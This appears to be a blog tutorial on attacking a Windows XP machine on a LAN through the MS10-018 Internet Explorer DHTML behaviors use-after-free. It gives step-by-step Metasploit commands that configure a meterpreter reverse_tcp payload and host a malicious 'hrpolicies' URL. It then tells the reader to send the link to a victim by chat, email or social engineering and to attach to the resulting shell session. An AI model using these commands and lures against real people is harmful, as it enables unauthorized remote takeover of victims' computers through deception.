How to Attack in LAN PC using Internet Explorer DHTML Behaviors

This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the “iepeers” vulnerability. The name comes from Microsoft’s suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which deref the reference and clean the object.” NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

Exploit Targets

0 – (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista (default)

1 – IE 6 SP0-SP2 (onclick)

2 – IE 7.0 (marquee)

Requirement

Attacker: Backtrack 5 

Victim PC: Windows XP

Open backtrack terminal type msfconsole

How to Attack in LAN PC using Internet Explorer DHTML Behaviors

Now type use exploit/windows/browser/ms10_018_ie_behaviors

Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.1.6 (IP of Local Host)

Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.1.6 (This must be an address on the local machine)

Msf exploit (ms10_018_ie_behaviors)>set uripath hrpolicies (The Url to use for this exploit)

Msf exploit (ms10_018_ie_behaviors)>exploit

How to Attack in LAN PC using Internet Explorer DHTML Behaviors

Now an URL you should give to your victim http://192.168.1.6:8080/hrpolicies

How to Attack in LAN PC using Internet Explorer DHTML Behaviors

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

How to Attack in LAN PC using Internet Explorer DHTML Behaviors

Related Posts Plugin for WordPress, Blogger...

Leave a Reply